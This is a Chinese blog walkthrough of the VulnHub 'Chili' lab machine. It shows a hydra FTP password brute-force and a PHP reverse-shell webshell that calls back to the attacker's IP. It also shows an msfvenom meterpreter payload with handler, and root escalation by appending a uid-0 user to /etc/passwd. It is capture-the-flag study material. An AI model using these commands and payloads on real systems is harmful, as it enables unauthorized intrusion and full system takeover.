chili靶机

最新推荐文章于 2024-07-25 23:22:06 发布
最新推荐文章于 2024-07-25 23:22:06 发布
阅读量286 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/133552083
版权

chilli

信息搜集

存活检测

image-20231002130359109

详细扫描

image-20231002130815050

后台扫描

image-20231002134943625

未发现后台

网页源代码查看

image-20231002135043312

未发现有用信息

ftp 密码爆破

  • 尝试用户名 chili 使用 hydra 对 ftp 进行密码爆破

    hydra -l chili -P /usr/share/wordlists/rockyou.txt ftp://192.168.245.130  -vV -I -f -t 64

    爆破出密码 a1b2c3d4

    image-20231002141119017

  • ftp 登录,搜集有用信息

    进入 /var/www/html 目录后发现具有读写执行最高权限的 .nano 目录

    image-20231002142133622

    尝试在目录中传入木马

webshell

方法1

  • 上传 webshell.php 文件到 .nano 目录下

    <?php
$ip='192.168.245.128';
$port=8888;
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh ' , $descriptorspec,$pipes);
proc_close($process);

    put webshell /var/www/html/.nano

  • 赋权

    chmod 777 webshell.php

  • kali 开启 nc 监听

    nc -lvvp 8888

  • 浏览器输入 php 文件地址连接反弹 shell

    image-20231002144159373

    image-20231002144218579

方法2

  • 生成 php 木马

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.245.128 LPORT=8888 R>shell.php

    image-20231002143531403

  • 将木马上传到 .nano 目录下

    put shell.php /var/www/html/.nano

    image-20231002144739545

  • 赋权

    chmod 777 shell.php

    image-20231002144904074

  • kali 启动木马程序

    msfconsole

  • 配置攻击载荷

    use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost=192.168.245.128
set lport=8888
run

    image-20231002145514719

    image-20231002145534541

  • 网页访问 192.168.245.128/.nano/shell.php

    image-20231002150645063

  • 连接成功

    image-20231002150722132

  • 输入 shell 获取 webshell

    image-20231002150850803

提权

  • 使用提权检测工具

    将检测工具下载到 kali,开启 http 服务

  • 在靶机上使用 weget 命令下载,赋权并运行漏洞检测脚本

    image-20231002153151432

    image-20231002153250020

  • 检测出漏洞,有对 passwd 文件的读写权限

    image-20231002153850487

  • 生成加密后的密码

    /usr/bin/perl -le 'print crypt("123","aa")'

    image-20231002161152319

    生成加密的密码 aamrgyQfDFSHw

  • 新建 root 用户

    echo 'gjl:aamrgyQfDFSHw:0:0:root:/root:/bin/bash' >> /etc/passwd

    image-20231002161431789

  • 登录新建的用户

    su gjl

    image-20231002161456158

提权成功

总结

  • 拥有 /etc/passwd 文件写入权限时,新建 root 用户

    加密密码可用 /usr/bin/perl -le 'print crypt("123","aa")' 计算

    其他版本 linux(kali)同样适用

    
[外链图片转存中...(img-wQCb2ShY-1696401537110)]

提权成功

总结

  • 拥有 /etc/passwd 文件写入权限时,新建 root 用户

    加密密码可用 /usr/bin/perl -le 'print crypt("123","aa")' 计算

    其他版本 linux(kali)同样适用

gjl_
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
靶机渗透测试(Chili
@小张小张的博客
09-25 1627
靶机渗透测试(Chili): Vulnhub靶机 Chili 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址为:192.168.10.88 2. nmap进行
vulnhub之chili
鲨鱼辣椒的博客
06-08 266
信息搜集 扫描网段 扫描
VulnHub渗透测试实战靶场 - CHILI:1
LYJ20010728的博客
08-20 1166
VulnHub渗透测试实战靶场 - CHILI:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.138 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65
VulnHub靶场系列:Chili
快吃小蛋糕吧的博客
10-05 1349
VulnHub靶场系列:Chili 刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的 环境部署: https://download.vulnhub.com/chili/Chili.ova 实战: 首先使用工具扫描靶机所在网段,得到靶机IP: root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report f
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 1965
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
【vulnhub】Chili 靶机
Nicky_Zheng的博客
01-29 735
1、信息收集 1.1、端口扫描 已通过netdiscover发现靶机 ip:192.168.57.142 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 17:11 CST Nmap scan report for 192.168.57.142 Host
chili文字高亮
08-28
"Chili文字高亮"是一种专门用于代码高亮显示的技术,它能够使网页中的代码片段根据其语法结构和功能以不同的颜色和样式呈现,从而提高代码的可读性和视觉吸引力。这种技术对于开发者社区和教育平台尤其重要,因为它...
chili-cookoff
05-02
5. **版本控制**:项目名称以"chili-cookoff-master"结尾,暗示它可能来自GitHub,其中"master"是主分支,表明项目使用Git进行版本控制。版本控制对于协作开发和代码管理至关重要。 6. **测试**:虽然描述中没有...
skansk-chili
04-11
斯堪斯克辣椒 构建设置 # install dependencies $ npm install # serve with hot reload at localhost:3000 $ npm run dev # build for production and launch server $ npm run build $ npm run start ...
chili-sensor
04-01
入门 正在安装 您可能需要 跑步 使用以下内容创建/arduino_secrets.h # define SECRET_SSID " your network name " # define SECRET_PASS " your password
Chili Piper Chrome Extension-3.0.4792.zip
12-29
名称:Chili Piper Chrome Extension -------------------- 版本:3.0.4792 作者:https://www.chilipiper.com/ 分类:生产工具 -------------------- 概述:安排会议和协作处理电子邮件的最快方式。从任何地方一键...
懒人精灵安卓版纯本地离线文字识别插件
YY007H的博客
07-25 1596
相对来说,在懒人精灵进行插件开发还是比较困难的,需要会原生安卓开发,本地识别全屏会相对较慢,区域识别还是非常快,相比部署在服务器上,还可以减少了很多资源占用情况,更加方便便捷。目前懒人精灵推出的普通版和高级版,对应的文字识别插件也分普通版和高级版。找字,返回传入字的中心点坐标,方便进行点击,找不到字时,返回[-1,-1]"cht":繁体,"japan":日语,"korean":韩语。1、打开懒人精灵,新建项目,双击资源.rc文件,添加文字识别插件。设置返回类型,默认"json",包含得分、坐标和文字;
android settings提示音开关状态与修改(一)
最新发布
五味香的专栏
07-25 506
通过,以上各类型提示音默认状态修改,可以按需求调整默认提示音开关状态。// 拨号按键提示音。// 拨号按键提示音。
堆的基本实现
zc331的博客
07-25 494
在提出堆的概念之前,首先要了解二叉树的基本概念一颗二叉树是节点的有限集合,该集合:1、或者为空;2、或者由一个根节点加上两颗分别称为左子树和右子树的两颗子树构成;堆就是一颗完全二叉树;堆有两种:小堆和大堆堆在内存上的存储是数组形式的(物理结构);我们认为想象成链式结构(逻辑结构)通过数组结构去实际存储,有这样的规律:每个父节点的下标乘以2加1就是左孩子节点,加2就是右孩子节点;无论是左孩子还是右孩子,其下标减去1再 /2 就是父节点的下标,这就是通过数组存储堆(完全二叉树)的优点。
【Web】LitCTF 2024 题解(全)
uuzeray的博客
07-25 536
file:///flag直接读本地文件。参考ctfshow web57。访问./dollar.php。以xml形式传数据,打xxe。{{7*7}}测出SSTI。随便找个payload打了。随便试一试,一眼ssrf。目录穿越拿到flag。
Android】广播机制
2301_79977698的博客
07-24 885
Android中,广播(Broadcast)是一种消息,任何应用程序都可以发送广播消息,任何应用程序也都可以接收广播消息。广播通常用于通知应用程序某些事件的发生,比如系统启动、电量低、网络状态改变等。Broadcast Receiver(广播接收器):用于接收广播消息并响应这些消息的组件。Intent(意图):用于传递广播消息的数据结构。标准广播(Normal Broadcast)是完全异步的,所有接收器几乎同时接收广播,并且接收顺序是不确定的。
文件包涵条件竞争(ctfshow82)
m0_74402888的博客
07-24 557
添加cookie,清除参数。修改url地址,修改命令。
Android SurfaceFlinger——GraphicBuffer的提交(三十三)
小旭的专栏
07-25 626
在 SurfaceFlinger 中,我们 dequeueBuffer 和 queueBuffer 是 Surface 控制接口中非常重要的两个函数,分别用于从 Surface 的 BufferQueue 中取出缓冲区和向 BufferQueue 提交(队列)缓冲区。这两个函数在生产者和消费者模型中扮演着核心角色,确保了图像数据的高效和有序传输。上一篇文章我们已经介绍了 dequeueBuffer() 函数,这里我们就来看一下 queueBuffer() 函数。
ch.qos.logback:logback-class:1.2.3
07-27
引用\[1\]:根据引用\[1\]中提到的问题和解决方案,ch.qos.logback:logback-class:1.2.3可能是一个引起冲突的日志依赖。在解决类似问题时,可以尝试以下步骤来解决冲突: 1. 使用Maven Helper等工具搜索并移除项目中的logback依赖,确保只有一个logback依赖被引入。 2. 如果问题仍然存在,可能是由于其他日志依赖引起的冲突。可以通过搜索log关键字来查找项目中的其他日志依赖,特别是与log4j相关的依赖。 3. 确定是否存在多个日志依赖中的冲突,特别是log4j-api。如果存在冲突,需要手动移除冲突的依赖,以解决冲突问题。 综上所述,如果你遇到了ch.qos.logback:logback-class:1.2.3引起的冲突问题,可以尝试以上方法来解决冲突。 #### 引用[.reference_title] - *1* *2* *3* [记maven冲突导致LF4J: Actual binding is of type [ch.qos.logback.classic.util....](https://blog.csdn.net/shark_chili3007/article/details/123080889)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值